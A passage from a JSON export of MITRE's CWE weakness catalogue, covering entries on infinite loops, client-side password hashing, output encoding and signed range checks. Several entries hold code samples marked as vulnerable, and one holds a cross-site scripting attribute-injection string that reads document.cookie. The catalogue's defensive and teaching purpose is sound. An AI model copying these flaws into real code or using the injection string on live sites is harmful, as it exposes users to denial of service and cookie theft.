Standard for Java (2011)"},"Entry_ID":"LCK08-J","Entry_Name":"Ensure actively held locks are released on exceptional conditions"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, &#34;Synchronization Problems&#34;, section &#34;Starvation and Deadlocks&#34;, Page 760"}},{"attr":{"@_External_Reference_ID":"REF-783","@_Section":"Chapter 7, &#34;Concurrency&#34;, section &#34;Mutual Exclusion and Deadlock&#34;, Page 248"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"834":{"attr":{"@_ID":"834","@_Name":"Excessive Iteration","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs an iteration or loop without sufficiently limiting the number of times that the loop is executed.","Extended_Description":"If the iteration can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory. In many cases, a loop does not need to be infinite in order to cause enough resource consumption to adversely affect the software or its host system; it depends on the amount of resources consumed per iteration.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Amplification","DoS: Crash, Exit, or Restart"],"Note":"Excessive looping will cause unexpected consumption of resources, such as CPU cycles or memory. The software\'s operation may slow down, or cause a long time to respond. If limited resources such as memory are consumed for each iteration, the loop may eventually cause a crash or program exit due to exhaustion of resources, such as an out-of-memory error."}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Forced Path Execution"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-1027","Description":"Chain: off-by-one error leads to infinite loop using invalid hex-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1027"},{"Reference":"CVE-2006-6499","Description":"Chain: web browser crashes due to infinite loop - \\"bad\\n\\t      looping logic [that relies on] floating point math [CWE-1339] to exit\\n\\t      the loop [CWE-835]\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Looping Constructs&#34;, Page 327"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}]}},"835":{"attr":{"@_ID":"835","@_Name":"Loop with Unreachable Exit Condition (\'Infinite Loop\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.","Extended_Description":"If the loop can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"834","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"834","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Amplification"],"Note":"An infinite loop will cause unexpected consumption of resources, such as CPU cycles or memory. The software\'s operation may slow down, or cause a long time to respond."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following code the method processMessagesFromServer attempts to establish a connection to a server and read and process messages from the server. The method uses a do/while loop to continue trying to establish the connection to the server when an attempt fails.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessagesFromServer(char *hostaddr, int port) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...int servsock;int connected;struct sockaddr_in servaddr;servsock = socket( AF_INET, SOCK_STREAM, 0);memset( &amp;servaddr, 0, sizeof(servaddr));servaddr.sin_family = AF_INET;servaddr.sin_port = htons(port);servaddr.sin_addr.s_addr = inet_addr(hostaddr);do {} while (connected &lt; 0);...","xhtml:br":["","","","","","","","","","","","","","","","",""],"xhtml:i":["// create socket to connect to server","// keep trying to establish connection to the server","// close socket and return success or failure"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"connected = connect(servsock, (struct sockaddr *)&amp;servaddr, sizeof(servaddr));if (connected &gt; -1) {}","xhtml:br":["","","","","",""],"xhtml:i":["// establish connection to server","// if connected then read and process messages from server"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// read and process messages"}}}}}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int processMessagesFromServer(char *hostaddr, int port) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...int count = 0;do {} while (connected &lt; 0 &amp;&amp; count &lt; MAX_ATTEMPTS);...","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// initialize number of attempts counter","// keep trying to establish connection to the server","// up to a maximum number of attempts","// close socket and return success or failure"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"connected = connect(servsock, (struct sockaddr *)&amp;servaddr, sizeof(servaddr));count++;if (connected &gt; -1) {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["// establish connection to server","// increment counter","// if connected then read and process messages from server"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// read and process messages"}}}}}}}}],"Body_Text":"However, this will create an infinite loop if the server does not respond. This infinite loop will consume system resources and can be used to create a denial of service attack. To resolve this a counter should be used to limit the number of attempts to establish a connection to the server, as in the following code."},{"Intro_Text":"For this example the method isReorderNeeded as part of a bookstore application that determines if a particular book needs to be reordered based on the current inventory count and the rate at which the book is being sold.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isReorderNeeded(String bookISBN, int rateSold) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isReorder = false;int minimumCount = 10;int days = 0;int inventoryCount = inventory.getIventoryCount(bookISBN);while (inventoryCount &gt; minimumCount) {}if (days &gt; 0 &amp;&amp; days &lt; 5) {}return isReorder;","xhtml:br":["","","","","","","","","","","","","","","","",""],"xhtml:i":["// get inventory count for book","// find number of days until inventory count reaches minimum","// if number of days within reorder timeframe","// set reorder return boolean to true"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"inventoryCount = inventoryCount - rateSold;days++;","xhtml:br":["","",""]}},{"#text":"isReorder = true;","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isReorderNeeded(String bookISBN, int rateSold) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...if (rateSold &lt; 1) {}...","xhtml:br":["","","","",""],"xhtml:i":"// validate rateSold variable","xhtml:div":{"#text":"return isReorder;","attr":{"@_style":"margin-left:10px;"}}}}}}],"Body_Text":"However, the while loop will become an infinite loop if the rateSold input parameter has a value of zero since the inventoryCount will never fall below the minimumCount. In this case the input parameter should be validated to ensure that a value of zero does not cause an infinite loop,as in the following code."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-1027","Description":"Chain: off-by-one error leads to infinite loop using invalid hex-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1027"},{"Reference":"CVE-2011-1142","Description":"Chain: self-referential values in recursive definitions lead to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1142"},{"Reference":"CVE-2011-1002","Description":"NULL UDP packet is never cleared from a queue, leading to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1002"},{"Reference":"CVE-2006-6499","Description":"Chain: web browser crashes due to infinite loop - \\"bad\\n\\t      looping logic [that relies on] floating point math [CWE-1339] to exit\\n\\t      the loop [CWE-835]\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499"},{"Reference":"CVE-2010-4476","Description":"Floating point conversion routine cycles back and forth between two different values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4476"},{"Reference":"CVE-2010-4645","Description":"Floating point conversion routine cycles back and forth between two different values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4645"},{"Reference":"CVE-2010-2534","Description":"Chain: improperly clearing a pointer in a linked list leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2534"},{"Reference":"CVE-2013-1591","Description":"Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591"},{"Reference":"CVE-2008-3688","Description":"Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-835"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Looping Constructs&#34;, Page 327"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-835"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"836":{"attr":{"@_ID":"836","@_Name":"Use of Password Hash Instead of Password for Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software records password hashes in a data store, receives a hash of a password from a client, and compares the supplied hash to the hash obtained from the data store.","Extended_Description":{"xhtml:p":["Some authentication mechanisms rely on the client to generate the hash for a password, possibly to reduce load on the server or avoid sending the password across the network. However, when the client is used to generate the hash, an attacker can bypass the authentication by obtaining a copy of the hash, e.g. by using SQL injection to compromise a database of authentication credentials, or by exploiting an information exposure. The attacker could then use a modified client to replay the stolen hash without having knowledge of the original password.","As a result, the server-side comparison against a client-side hash does not provide any more security than the use of passwords without hashing."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"602","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"An attacker could bypass the authentication routine without knowing the original password."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1283","Description":"Product performs authentication with user-supplied password hashes that can be obtained from a separate SQL injection vulnerability (CVE-2009-1282).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1283"},{"Reference":"CVE-2005-3435","Description":"Product allows attackers to bypass authentication by obtaining the password hash for another user and specifying the hash in the pwd argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"652"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"837":{"attr":{"@_ID":"837","@_Name":"Improper Enforcement of a Single, Unique Action","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software requires that an actor should only be able to perform an action once, or to have only one unique action, but the software does not enforce or improperly enforces this restriction.","Extended_Description":"In various applications, a user is only expected to perform a certain action once, such as voting, requesting a refund, or making a purchase. When this restriction is not enforced, sometimes this can have security implications. For example, in a voting application, an attacker could attempt to \\"stuff the ballot box\\" by voting multiple times. If these votes are counted separately, then the attacker could directly affect who wins the vote. This could have significant business impact depending on the purpose of the software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"799","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":"Other","Note":"An attacker might be able to gain advantage over other users by performing the action multiple times, or affect the correctness of the software."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-0294","Description":"Ticket-booking web application allows a user to lock a seat more than once.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0294"},{"Reference":"CVE-2005-4051","Description":"CMS allows people to rate downloads by voting more than once.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4051"},{"Reference":"CVE-2002-216","Description":"Polling software allows people to vote more than once by setting a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-216"},{"Reference":"CVE-2003-1433","Description":"Chain: lack of validation of a challenge key in a game allows a player to register multiple times and lock other players out of the game.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1433"},{"Reference":"CVE-2002-1018","Description":"Library feature allows attackers to check out the same e-book multiple times, preventing other users from accessing copies of the e-book.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1018"},{"Reference":"CVE-2009-2346","Description":"Protocol implementation allows remote attackers to cause a denial of service (call-number exhaustion) by initiating many message exchanges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2346"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"838":{"attr":{"@_ID":"838","@_Name":"Inappropriate Encoding for Output Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses or specifies an encoding when generating output to a downstream component, but the specified encoding is not the same as the encoding that is expected by the downstream component.","Extended_Description":{"xhtml:p":["This weakness can cause the downstream component to use a decoding method that produces different data than what the software intended to send. When the wrong encoding is used - even if closely related - the downstream component could decode the data incorrectly. This can have security consequences when the provided boundaries between control and data are inadvertently broken, because the resulting data could introduce control characters or special elements that were not sent by the software. The resulting data could then be used to bypass protection mechanisms such as input validation, and enable injection attacks.","While using output encoding is essential for ensuring that communications between components are accurate, the use of the wrong encoding - even if closely related - could cause the downstream component to misinterpret the output.","For example, HTML entity encoding is used for elements in the HTML body of a web page. However, a programmer might use entity encoding when generating output for that is used within an attribute of an HTML tag, which could contain functional Javascript that is not affected by the HTML encoding.","While web applications have received the most attention for this problem, this weakness could potentially apply to any type of software that uses a communications stream that could support multiple encodings."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could modify the structure of the message or data being sent to the downstream component, possibly injecting commands."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use context-aware encoding. That is, understand which encoding is being used by the downstream component, and ensure that this encoding is used. If an encoding can be specified, do so, instead of assuming that the default encoding is the same as the default being assumed by the downstream component."},{"Phase":"Architecture and Design","Strategy":"Output Encoding","Description":"Where possible, use communications protocols or data formats that provide strict boundaries between control and data. If this is not feasible, ensure that the protocols or formats allow the communicating components to explicitly state which encoding/decoding method is being used. Some template frameworks provide built-in support."},{"attr":{"@_Mitigation_ID":"MIT-4.3"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.","Note that some template mechanisms provide built-in support for the appropriate encoding."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code dynamically builds an HTML page using POST data:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = $_POST[\'username\'];$picSource = $_POST[\'picsource\'];$picAltText = $_POST[\'picalttext\'];echo \\"&lt;title&gt;Welcome, \\" . htmlentities($username) .\\"&lt;/title&gt;\\";echo \\"&lt;img src=\'\\". htmlentities($picSource) .\\" \' alt=\'\\". htmlentities($picAltText) . \'\\" /&gt;\';","xhtml:br":["","","","","","","",""],"xhtml:i":["...","..."]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"\\"altTextHere\' onload=\'alert(document.cookie)\\""},{"attr":{"@_Nature":"result","@_Language":"HTML"},"xhtml:div":"&lt;img src=\'pic.jpg\' alt=\'altTextHere\' onload=\'alert(document.cookie)\' /&gt;"}],"Body_Text":["The programmer attempts to avoid XSS exploits (CWE-79) by encoding the POST values so they will not be interpreted as valid HTML. However, the htmlentities() encoding is not appropriate when the data are used as HTML attributes, allowing more attributes to be injected.","For example, an attacker can set picAltText to:","This will result in the generated HTML image tag:","The attacker can inject arbitrary javascript into the tag due to this incorrect encoding."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-2814","Description":"Server does not properly handle requests that do not contain UTF-8 data; browser assumes UTF-8, allowing XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2814"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS13-J","Entry_Name":"Use compatible encodings on both sides of file or network IO"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"468"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-786"}},{"attr":{"@_External_Reference_ID":"REF-787"}},{"attr":{"@_External_Reference_ID":"REF-788"}},{"attr":{"@_External_Reference_ID":"REF-789"}},{"attr":{"@_External_Reference_ID":"REF-709","@_Section":"Preventing XSS Attacks"}},{"attr":{"@_External_Reference_ID":"REF-725"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"839":{"attr":{"@_ID":"839","@_Name":"Numeric Range Comparison Without Minimum Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program checks a value to ensure that it is less than or equal to a maximum, but it does not also verify that the value is greater than or equal to the minimum.","Extended_Description":{"xhtml:p":["Some programs use signed integers or floats even when their values are only expected to be positive or 0. An input validation check might assume that the value is positive, and only check for the maximum value. If the value is negative, but the code assumes that the value is positive, this can produce an error. The error may have security consequences if the negative value is used for memory allocation, array access, buffer access, etc. Ultimately, the error could lead to a buffer overflow or other type of memory corruption.","The use of a negative number in a positive-only context could have security implications for other types of resources. For example, a shopping cart might check that the user is not requesting more than 10 items, but a request for -3 items could cause the application to calculate a negative price and credit the attacker\'s account."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"195","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"682","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"124","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Signed comparison","Description":"The \\"signed comparison\\" term is often used to describe when the program uses a signed variable and checks it to ensure that it is less than a maximum value (typically a maximum buffer size), but does not verify that it is greater than 0."}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could modify the structure of the message or data being sent to the downstream component, possibly injecting commands."},{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"in some contexts, a negative value could lead to resource consumption."},{"Scope":["Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory"],"Note":"If a negative value is used to access memory, buffers, or other indexable structures, it could access memory outside the bounds of the buffer."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Enforcement by Conversion","Description":"If the number to be used is always expected to be positive, change the variable type from signed to unsigned or size_t."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"If the number to be used could have a negative value based on the specification (thus requiring a signed value), but the number should only be positive to preserve code correctness, then include a check to ensure that the value is positive."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet-&gt;headers;if (numHeaders &gt; 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed 